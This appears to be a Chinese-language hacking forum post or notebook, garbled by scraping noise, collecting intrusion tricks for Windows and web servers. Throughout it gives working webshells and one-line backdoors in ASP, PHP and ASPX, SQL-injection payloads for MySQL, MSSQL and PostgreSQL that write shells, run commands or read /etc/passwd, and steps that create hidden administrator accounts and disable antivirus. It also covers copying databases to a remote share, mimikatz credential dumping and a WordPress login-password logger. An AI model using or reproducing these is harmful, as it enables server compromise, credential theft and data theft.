SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
2 r' T. Z6 [( O; Q0 S% laccess中导出shell; ], j: y0 y: [* [* _
1 D) j0 {  F2 S% N( W% P
中文版本操作系统中针对mysql添加用户完整代码:
6 c* F% F" i0 Y
' o. d! j5 g& I) muse test;
1 T; c( u0 V; [7 q9 Gcreate table a (cmd text);
8 t* ^+ E4 R1 l2 Pinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
2 b# N; z7 ]6 k. N3 i5 c, Cinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );7 n7 T. Q) t( s, Q
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
+ T: j  ?! j/ Y  v1 K" Z6 ~select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
( @  @) }; Y4 D7 v$ A: ldrop table a;9 {8 F+ p, [2 r: C

, u6 S5 |- r  F4 g% T  Y1 ~# O英文版本:
, X: e' L# l, z) G$ [3 F! }7 \5 m9 q: P  Z7 B) t% l7 {. N8 ~$ ^' M
use test;
4 S8 O+ x# ~7 D" x1 V" B. ?create table a (cmd text);
* k* M6 @+ N! r+ Finsert into a values ("set wshshell=createobject (""wscript.shell"") " );
5 g- ~: q4 k- u3 {! V0 Ginsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );9 R* Q5 q6 o, E# N" ?  W& ~4 t1 I- o
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
! ~+ q/ x9 [, l& A+ E2 K! u/ {select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
1 [- w/ `0 ~: j" e! ydrop table a;( b" B/ k% F2 F5 J5 `
& G! b+ f5 K  a
create table a (cmd BLOB);
+ h! @; ]$ }# k7 U$ D. c: vinsert into a values (CONVERT(木马的16进制代码,CHAR));
; I+ ]# {1 l% hselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
: w- E8 K+ G: Hdrop table a;
% g! @  T7 }- n
7 A0 y5 Q/ w2 g! V$ M记录一下怎么处理变态诺顿, I1 D6 X8 h0 ?& R5 \+ l1 [
查看诺顿服务的路径
) V! |2 |( \" dsc qc ccSetMgr; p+ K, j; \( x8 Z+ S8 d2 r% I$ A
然后设置权限拒绝访问。做绝一点。。
# ]% k1 e& ?' ]cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system/ n! ?2 c' K( y: S+ X
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
% A8 ~/ @5 c2 g7 G  o* M6 O  L0 X( H! A* bcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
% d$ l7 T. w* k5 }' y7 ecacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone3 m9 C( F6 Q* U  u; b
2 r( m8 y3 K- V4 v  ]2 `4 p+ \
然后再重启服务器
, q" F: H0 V( I* X( t" uiisreset /reboot
9 Q3 U! p( j- r* N6 _这样就搞定了。。不过完事后。记得恢复权限。。。。
6 D( Z& g% {1 ^" D' D) N2 d3 Lcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
  U9 N$ I* ?; `5 Q% T3 W' C) `cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F( T; O- O, S7 ?6 @
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F' g" z) g/ W% [, I/ o5 x
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
4 d2 ^0 R5 ]7 ^6 _" xSELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
) S$ Z! S3 a1 _5 v% ]6 b, N& [! |, r9 G$ \* d  D+ a& ^
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
: z4 \5 T/ M% L  o, `$ W2 E: k/ f: R+ {( o: c
postgresql注射的一些东西$ w# k3 ~) K  H( h- Q' v
如何获得webshell( m7 t- l( B9 g) w  B
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
/ z6 u! t! ~& J& c: Phttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); 2 K% T' x) p9 x! E: G7 K- D
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
2 x% T; U4 I5 R; J3 g& x如何读文件
3 h% B. D9 U  T7 Bhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);: j1 J/ L. N+ q- w
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;7 [6 K1 }6 `# s( a. A* y5 w
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
8 P( @- `# B) {/ `$ U$ J
/ j5 J2 }/ v; Dz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
0 b2 k& u( Y# ?3 o# M. b# W当然,这些的postgresql的数据库版本必须大于8.X
0 S/ ?  ?; d" i4 ~8 Z创建一个system的函数:
* S6 j- e9 @/ ]* }7 p: ~* `3 F% OCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
+ p# @4 z! M" A( ^- ]9 S% g, i; x! |4 U  b$ S; C9 Q; y
创建一个输出表:! `- K" f/ H5 r/ o3 w  R; X
CREATE TABLE stdout(id serial, system_out text)2 R' E( r: {9 N1 O1 P
0 I: ^$ _. F! n) z- }& l! A
执行shell,输出到输出表内:4 v7 B# }# A4 e: d2 b  N4 R
SELECT system('uname -a > /tmp/test')8 t/ b( j5 ?, |  [7 n

+ w# B4 ^) b( p+ M0 acopy 输出的内容到表里面;
% x" ^1 E. k$ z2 D4 l' G' zCOPY stdout(system_out) FROM '/tmp/test'7 L; A( G& J/ M3 r. U1 ]9 ]* ?

. m- M& W# ]  r* a从输出表内读取执行后的回显,判断是否执行成功
6 Y: b/ y! q+ Y2 |0 |: u* h# W3 d3 B9 _
SELECT system_out FROM stdout
# {/ F& w6 ~0 w/ B  n下面是测试例子4 @3 E/ v% P2 `& Q

& B9 ]4 M% K7 p+ O* k5 s/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
" T, k1 T7 F3 _5 ?  B% g4 X! l* [0 h; u; d, E
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'" l' u2 F) G6 S, {9 d
STRICT --" f2 r! i/ [9 i" V; ^! H
5 p" z8 b& X. t% ~4 o* J. X
/store.php?id=1; SELECT system('uname -a > /tmp/test') --/ l5 W; m9 |8 Z$ G6 V+ I

+ E# q4 x8 H* s* `9 d" `. k/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
* b: t# E5 u9 n5 r6 S( t+ t9 Z# |8 Z  D
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--" ?) a7 r0 P6 R/ N) O6 g
net stop sharedaccess    stop the default firewall
- t5 k% L- o6 t0 J% [+ y# bnetsh firewall show      show/config default firewall
# u( ^6 ?6 y( k7 D8 ]9 X7 \netsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall% ], m- |2 t3 {9 L( ^
netsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall
0 U/ a) D$ a. o8 h4 ^( q修改3389端口方法(修改后不易被扫出)
# k- Y- K/ u+ U  B修改服务器端的端口设置,注册表有2个地方需要修改
( g5 h% g  H  A5 A  Q4 s8 Y7 F, [6 P+ y* d0 u
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
" O+ R  P) l5 {4 _* s6 J' pPortNumber值,默认是3389,修改成所希望的端口,比如6000; t# k0 E9 g: ^4 y
' \4 }& J; q3 h
第二个地方:: I+ `! [. V* n  u* v5 d* z* V! k3 D
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 
+ [9 n5 ^& q2 x. ]PortNumber值,默认是3389,修改成所希望的端口,比如60006 B3 y1 w- J$ u% ~! g
( t& w3 `4 N( N/ |4 I9 S5 r
现在这样就可以了。重启系统就可以了
' j# @3 D& J2 D  {; k  H
9 a2 c2 F$ u" f1 E5 ~- _查看3389远程登录的脚本
% U$ [  L% X! m  Q/ C4 v& G5 G保存为一个bat文件
; Z/ m! K  f3 S! g' c9 \date /t >>D:\sec\TSlog\ts.log* {* c4 k( ]) y4 U8 x! y4 F
time /t >>D:\sec\TSlog\ts.log
+ ~; o2 R7 G- p% a- wnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log+ U' ~5 O- {% |  ~8 t+ |
start Explorer1 J4 t- ?4 H0 s$ I3 R! b
3 Z3 D# @. W& I0 d# Z
mstsc的参数:
0 P* ?' r% O' r) _" y
4 c; ~: l) f) q' D3 \远程桌面连接% O5 z* F. i' d+ H# {6 U+ J
: q& f% c/ b6 I% X1 \$ ]  S& Q* v4 Z1 D
MSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]$ a$ g# l% S0 ^; ?, G
  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
) h: z6 r; V5 I( A$ _% h& y/ U; Q. X1 o7 D5 v5 u) _
<Connection File> -- 指定连接的 .rdp 文件的名称。* n! H3 {% N) h2 A4 s9 j/ [* M9 u
2 g* B2 m; m# S; Q
/v:<server[:port]> -- 指定要连接到的终端服务器。( S5 O4 j& J, O' m9 |/ Z/ g

$ m$ G( J6 e  x, M# p" S& G/console -- 连接到服务器的控制台会话。: y+ j5 g2 b  b
/ F$ P# b( f+ B, J
/f -- 以全屏模式启动客户端。0 e9 q( ^% P6 |' U

7 P! q: S0 T/ E# e% g7 |/w:<width> --  指定远程桌面屏幕的宽度。
- H/ W% `9 p% g2 N
2 @; M3 l+ x2 S$ w! m2 y1 i/h:<height> -- 指定远程桌面屏幕的高度。; t- {/ n6 W$ ~1 e

9 A+ e& ^& j. g1 g& ^& d/edit -- 打开指定的 .rdp 文件来编辑。
5 S! Y2 X- K! L; x  l+ H
4 u8 E) [2 M. t1 s! I: j6 o/migrate -- 将客户端连接管理器创建的旧版
; b$ _# C5 U( B; k% i7 E4 w连接文件迁移到新的 .rdp 连接文件。+ |1 b& f, m* t+ [* D5 y2 R

3 Z# p# Y# Z! I5 s& `8 {. C5 u, }! v: N" M  s: e
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
6 G# |6 d% }; L% S' Kmstsc /console /v:124.42.126.xxx 突破终端访问限制数量& S7 o9 }* w% [, q3 [7 y- Z8 \

1 N" C! ~. q9 \& j$ V9 G6 N( c命令行下开启3389% [8 d, q" m/ ^$ `, A7 W
net user asp.net aspnet /add. j0 {+ B  l9 H$ V* k& l2 m& j
net localgroup Administrators asp.net /add
. Q0 E# {7 [  p' q: Z& s* knet localgroup "Remote Desktop Users" asp.net /add
9 e5 ^9 U3 ^& U2 Q3 C& z+ {3 b  Wattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
4 n3 g3 r/ K( }3 i; cecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0; }3 ?* ^' d8 f' {3 U  E  k  Y; H
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
; H" P5 Y' M. ]! Z( ^6 A9 ?echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f% k6 O& F$ g' u, X% N* z3 ~6 P
sc config rasman start= auto
. r0 M/ U, y& s! c4 Q3 asc config remoteaccess start= auto/ u! K; U0 f- [
net start rasman* I: W- z& b+ F& S
net start remoteaccess, s  V; A1 F7 O3 `! E3 }
Media. I1 }8 d( G& _9 H" L1 }4 w5 l0 r
<form id="frmUpload" enctype="multipart/form-data"
" k/ A1 v4 I4 Caction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
. ?: V: K  {; u7 `( L0 _/ P<input type="file" name="NewFile" size="50"><br>
* U: h8 Z2 t! a! p+ w3 n% ]6 M: s2 ~<input id="btnUpload" type="submit" value="Upload">
, S% D: v, e; q( ?' w: _</form>
( T+ G+ j' D# x- m5 ^# |4 a! n4 s  z& d* R$ o9 ~6 `: M# k
control userpasswords2 查看用户的密码  D6 k7 J$ h: j/ G1 i; W( Y0 Z
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
) L9 J- u& @2 i! K0 T& w; ySELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
+ ]: X1 \) X% Q, R& ]
. f2 L1 `5 g" f2 p# F141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:( ~, E& M" A2 h' c7 h  Y0 M
测试1:: A5 t5 c5 a8 U) X9 ?
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
& S1 o3 Y/ O$ ~1 E8 m) u# ~' L' \1 h" r9 R# k" Q6 K  z$ y
测试2:
+ C0 v- C% v( a# V  n; O+ X8 S* P- N
create table dirs(paths varchar(100),paths1 varchar(100), id int)
# r' ~6 G3 ^1 y2 s2 z; ?$ \8 J) y/ P2 f8 W7 _
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--& ]2 @+ h. p9 B+ d7 y

% I6 M# R4 j: n& m9 |, zSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1( w; Z. z5 h- T
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令3 M+ v2 w, D% \. p5 M) N6 R& H
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;, F. e) _- m- c% M. p
net stop mcafeeframework
) P; M7 \2 `! Snet stop mcshield
! O$ r2 L& h1 C# k% T$ Qnet stop mcafeeengineservice' J/ t4 s$ o  d
net stop mctaskmanager
  r* d0 u- x  {, [/ uhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D: a" U$ \- x% z* o6 p: |. k  O

# a' V3 E- y" x( J  VNCDump.zip (4.76 KB, 下载次数: 1)
4 A5 R) `+ E! w/ o密码在线破解http://tools88.com/safe/vnc.php  T( x  M; n1 g3 \* E% s
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取3 d7 T: @' A  @3 f1 v9 p/ r
# R% z: A/ C8 ]+ T
exec master..xp_cmdshell 'net user'% d! j' }- ]% U9 g9 m" }. e8 I6 G
mssql执行命令。
8 o5 r& r0 h- x8 n* u* {6 H" m获取mssql的密码hash查询5 Z9 l# M+ Y: [9 m2 |
select name,password from master.dbo.sysxlogins
4 G# E6 F; \+ x: f& ?5 Y( P
$ s. Z% v6 u5 ?. H- ]* Q8 Ibackup log dbName with NO_LOG;
5 y  b1 L' C$ [8 D  X( B+ vbackup log dbName with TRUNCATE_ONLY;
  }; ~4 X$ W1 K, w6 sDBCC SHRINKDATABASE(dbName);
6 m' ?" g5 N0 F6 Dmssql数据库压缩
* n' L$ X  b: ~  v% k! S9 s
8 l. k7 F5 t; g8 bRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
$ ~+ m0 J, P; S' j: e将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。7 e* ^7 r9 V. H8 i/ p& k
, P$ @1 ~( C1 k0 p2 q
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
' L( J& Y9 ~( I) |0 H+ ?1 A6 h备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak* \4 g" M! u! j5 A7 u8 P
9 A3 H! B" Z. s' m3 v
Discuz!nt35渗透要点:' ?0 Y9 ~* Q6 {4 s8 {
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
; l1 I: R- K9 Y0 Z8 P4 r+ J1 `, Y(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>& p* O" k: S, q1 l* Z, u# \
(3)保存。
1 B# ?$ v! j& |) U6 I(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass; X7 O) b5 E2 X
d:\rar.exe a -r d:\1.rar d:\website\* S# P& v! ?6 t! ~; e' u! E
递归压缩website! _0 }- r' C; q
注意rar.exe的路径
1 O' J1 y! Q/ p3 `% g2 [5 g( b. j& ]
<?php& w2 e2 P; e7 b6 ^2 A
* u: _9 I; Y- j# j( b: b
$telok   = "0${@eval($_POST[xxoo])}";
. r6 b( o! _1 |) X6 e
  A/ B( d2 a" v) B# U0 [+ k$username   = "123456";
1 K$ T4 z3 r  `: B$ ]/ O, ~
+ P( y! {" a- u5 Z$userpwd   = "123456";
# z. o  o: R  O8 a8 F1 K6 Y. `' J9 V/ z, [
$telhao   = "123456";
; Q" O* e& o4 V+ p
% p7 ?7 O2 O* d0 l# ~: }; K$telinfo   = "123456";
. }% P" T' {- {- F/ e. X( X& z0 a
* a. x4 j9 w1 x?>
, @- X9 d3 R2 V& [php一句话未过滤插入一句话木马
# D( b5 A0 v' t0 K, F4 S
$ b, d7 u4 K9 ]: p* V/ e1 ]站库分离脱裤技巧6 f( w9 u1 u) W- G
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
" F, H' U  i- s, }% @" h6 y7 K4 Zexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'# J% ]' B# c9 j" _3 b' E$ |
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
0 q8 J% m  m4 {( Y$ b5 B7 L这儿利用的是马儿的专家模式(自己写代码)。
3 k1 Z6 v3 E) j/ v% Z0 o- D  k+ Jini_set('display_errors', 1);
" I5 Q$ x3 V6 @4 p- Oset_time_limit(0);
. [: E4 V' a9 J6 J/ K( w9 \/ Z& ?( f" Cerror_reporting(E_ALL);
' h% G* K& l$ ^3 R' ~$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());4 n- F* D% C3 R' D- [* j7 d$ i
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());5 i. w3 c. {6 N- z" [: F* }
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());7 t5 ^$ }$ z0 A* e% o/ U- L  C& X
$i = 0;
* u! c9 L' H- r6 x7 ]7 i$tmp = '';/ G+ t2 Y+ T' y3 h8 e+ `, R
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {6 U7 Q: @, C) k" y
    $i = $i+1;
( K" ~8 L# J1 h' V8 I    $tmp .=  implode("::", $row)."\n";
$ x$ G, O) x- I- S    if(!($i%500)){//500条写入一个文件- b& k7 F5 f" d0 `" D! T
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
3 {  n1 y  n) R9 J        file_put_contents($filename,$tmp);5 p" v5 L+ C' }4 |" v
        $tmp = '';) @( b) d+ Y4 V$ i$ V& H
    }
3 H+ q" \2 k9 Z* H! G/ s}
1 ^& P. I  `8 `  }mysql_free_result($result);
# q: r0 l  }2 n7 w; W) f
' ]5 o6 s3 a7 o; S( p8 R3 P
2 a) O6 T/ m  B! F# x) H  N& [  j. y& Y9 l% T
//down完后delete
5 D7 b! M% ]+ ~& M5 }! t0 o6 C; C) O# D. m# `
, i# L/ f' ^* }# B( U1 j. q/ H$ ~
ini_set('display_errors', 1);
# x# F& }4 @) ~: _; X) Z9 Terror_reporting(E_ALL);' P6 B' v3 b' u" N
$i = 0;1 V: S, w5 h; u
while($i<32) {
& _: s/ [) ?' J* X    $i = $i+1;) ?. y/ p7 y2 d3 j
        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';. Q4 t6 [. r8 s" b
        unlink($filename);; U9 d( q3 v, I2 m1 }
}
" _/ r( V- |! b* U5 q4 m& h0 shttprint 收集操作系统指纹
2 ^  M3 W8 T2 X: ~0 j6 P* ]+ f2 L# Z扫描192.168.1.100的所有端口
4 r+ V2 t+ o/ g0 Jnmap –PN –sT –sV –p0-65535 192.168.1.100$ K, u: k% d3 F$ G% {7 u1 b# S
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
) @1 z. S0 T1 X# ]. Thost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输! l9 I: u- z+ B+ u# w7 v) g, V9 r
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
  f4 c2 \! z7 F6 q. v" B/ B7 T% `2 }& N7 F8 c+ x5 [  X
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
8 |* y$ z$ o) n$ X7 n5 k) f, v# c
  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)" c  M' U' @+ ~/ K3 j/ b1 ?, l- |
# ~9 s# ^3 N$ e& u3 b6 }
  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
' C0 N' ?# u( ^% p3 V+ K8 G: h, Z2 r( [
  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
; Q9 k4 R- b" h: S' s$ u. ?( f: c7 o
  http://net-square.com/msnpawn/index.shtml (要求安装)
, @' t/ o7 g  Z- ~
9 l* G6 t, e& C9 \  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)/ K1 ]% j! r% r& ?1 e* d( k0 |" w

7 G: Z9 j2 J1 K2 X6 k8 d: G  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)' R) I# o! R# m1 C
set names gb2312& e2 n3 D. d" A6 M2 I! D
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。  C# {* z1 ^. D9 N6 o
. J1 J& C0 w5 q
mysql 密码修改
. x6 _5 ]7 M0 D! u0 g/ ^  W% q  wUPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ” / v2 a$ A9 r3 X5 M: |; m1 E$ A  o$ g3 i
update user set password=PASSWORD('antian365.com') where user='root';
/ L3 }9 S* T% r8 s" v$ a( e. @flush privileges;
; P' u" M# ?9 Z: v) D6 O, H高级的PHP一句话木马后门
! G3 O8 g, U& }: m
7 h9 J1 [+ v. {; {4 B7 m, ^入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
( I; z: i3 |+ ~( e( A; Y2 @1 C# e' @" \/ w7 \7 C4 G
1、/ h2 x, G0 N) C; S

, u/ [# @4 K3 M' p3 K' o$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";4 ]+ h- l% N! \, Y: a/ H! w& y

. ~& c% J3 q8 L- w1 T$hh("/[discuz]/e",$_POST['h'],"Access");
# H1 _; }; S- e* V' a" `4 E( I: @
9 w. g+ l% P0 p3 i1 X//菜刀一句话; d5 m: U0 C# E( n6 Z: z

+ w! U3 }! x; x/ \2、+ `- t  f; z' M! q  r6 |8 B
' c& w. s9 D4 i0 v( {6 a# A
$filename=$_GET['xbid'];
% o' w1 T  S6 j- D  A7 k# B5 B: c4 g# [8 u" a
include ($filename);  P  p: ~. d0 Q' o+ [
! G  O5 T! t2 {5 w8 V1 Q0 R
//危险的include函数,直接编译任何文件为php格式运行
% z! j- {; W1 O! }# J/ Q, U. D
! R3 B9 N8 u; h& t0 X3、
/ n7 p7 s) ~+ u7 y7 a% s; K+ u% h# P! }9 |' Y
$reg="c"."o"."p"."y";5 D- H; p+ V* E; m5 z/ m9 F$ B$ Y

- c" K6 k$ l1 p8 i- j$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);; L/ l. J7 s( x' ^
* a8 l7 Z# p9 i- f2 v4 \
//重命名任何文件
9 Z) k1 R2 b* x0 l5 R
7 H4 v* Q4 u& G* |3 Z/ V7 {6 I4、, `( ]+ m* ^7 @8 r
4 @+ k! D4 U3 Y" H/ |- \
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
% E' d9 i) V$ W2 x' p+ {( H0 s
+ O* I3 y6 I- v' |. W$gzid("/[discuz]/e",$_POST['h'],"Access");
5 ]& A) T0 \. |! a2 Y  l( ]
( H3 V+ f' k6 z* H& \4 @! _//菜刀一句话. e5 \; n6 r# ?" f) @) {9 g

) b  U8 ]4 f( N! `5、include ($uid);1 k9 N+ {  L& q+ m  x5 ]# k( U

5 `* [( ?4 W& `5 _//危险的include函数,直接编译任何文件为php格式运行,POST ; c. t" S7 O( f8 ?; ?7 c

8 u) w6 [1 j& F, M  `! O% A/ r1 C8 j/ J8 u1 W
//gif插一句话
3 t$ R! K8 n  f) n
# Y, N/ A8 N' Z! W6、典型一句话) D2 P0 g: o5 ^! v4 |$ t
; @. U0 {+ {- l  a5 c. |: n
程序后门代码% |2 k1 T3 E  O9 e& }6 {! D
<?php eval_r($_POST[sb])?>
' z3 p; x2 J$ c% x0 ]程序代码
1 p0 B4 y; |; o<?php @eval_r($_POST[sb])?>
; b/ R/ ~9 ^5 j+ A: Q1 K1 R1 ]//容错代码! B: G) [% y' w: c
程序代码
; g$ n+ \. l7 h  H<?php assert($_POST[sb]);?>
/ S4 R  U6 I* U  P' \) ~8 S- x//使用lanker一句话客户端的专家模式执行相关的php语句
5 R, i+ o# ?. F9 u5 o; ^; l9 I. B程序代码
3 K* I& L9 X2 |9 z, G% K<?$_POST['sa']($_POST['sb']);?>
+ ^& Z: d- y2 F& K- m/ C程序代码
6 v0 X* n' [) J6 _, E+ E<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
# }& l/ t  g5 {7 i程序代码" r5 M+ i5 ?5 p! ?+ J  ~0 U
<?php
9 q$ }7 u4 i  z* r+ q; ^8 K@preg_replace("/[email]/e",$_POST['h'],"error");& z" o* y' i# i$ }1 |7 M4 R
?>7 e! i) M$ o2 S! e9 f" V5 r' B
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
! l2 H2 _) q) Z8 G$ @程序代码
$ W, Q& u. L/ x4 e/ t# R2 g<O>h=@eval_r($_POST[c]);</O>1 D( N' E8 L! n. x
程序代码
  j! ^1 \' G3 _& P& u+ K<script language="php">@eval_r($_POST[sb])</script>  o! x: A+ z- V' v1 N: I! V8 |* W
//绕过<?限制的一句话2 T- o. j3 \0 F- C8 t9 D7 E8 k$ G
: D( y1 V3 k" R$ j+ {
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip/ [* J! E, k- E" I6 E! l
详细用法:
" G2 C, G$ ?' i9 T4 A% s1、到tools目录。psexec \\127.0.0.1 cmd
+ X  N9 m% d5 v; z2、执行mimikatz
! i9 a2 ]4 p$ z0 a3、执行 privilege::debug
9 ^& I  p3 J7 V1 f, ?4、执行 inject::process lsass.exe sekurlsa.dll
7 @9 x3 M% r0 N" p7 ]5、执行@getLogonPasswords
. f- n7 I3 d% Q' i4 H6、widget就是密码$ w- I& [/ `8 q% |
7、exit退出,不要直接关闭否则系统会崩溃。/ S2 V& |8 N7 I4 L3 D9 x1 m/ N3 G2 Z
9 `* v3 r$ ?0 d/ O. C* F: A
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面  c3 S& O: ]8 q) L6 d: q0 M

! H8 A" ~7 M! L* O; M# A自动查找系统高危补丁& z, L4 _! n2 q+ Z# g
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt- [. a% h: _1 F

/ B6 V5 i" j+ S突破安全狗的一句话aspx后门5 C% U( X# |0 ^6 e1 {; s9 L
<%@ Page Language="C#" ValidateRequest="false" %>
9 F: v( ~. X: W) Y! a5 u<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
' M9 d# ~  O0 e$ d5 n; d$ V5 `webshell下记录WordPress登陆密码
! l/ O  N! C& x7 V7 c$ ?* Owebshell下记录Wordpress登陆密码方便进一步社工
" e% V6 @2 m7 I( [在文件wp-login.php中539行处添加:) k6 v- Q' J  ]6 U/ |$ p9 P. A8 w
// log password" c' I* z7 W5 h
$log_user=$_POST['log'];2 ]' u1 q3 Z. E$ W+ x- H5 |
$log_pwd=$_POST['pwd'];  v9 \& s2 [5 p  G& M
$log_ip=$_SERVER["REMOTE_ADDR"];% J$ a; \! H7 f$ D9 T  B3 W7 ^
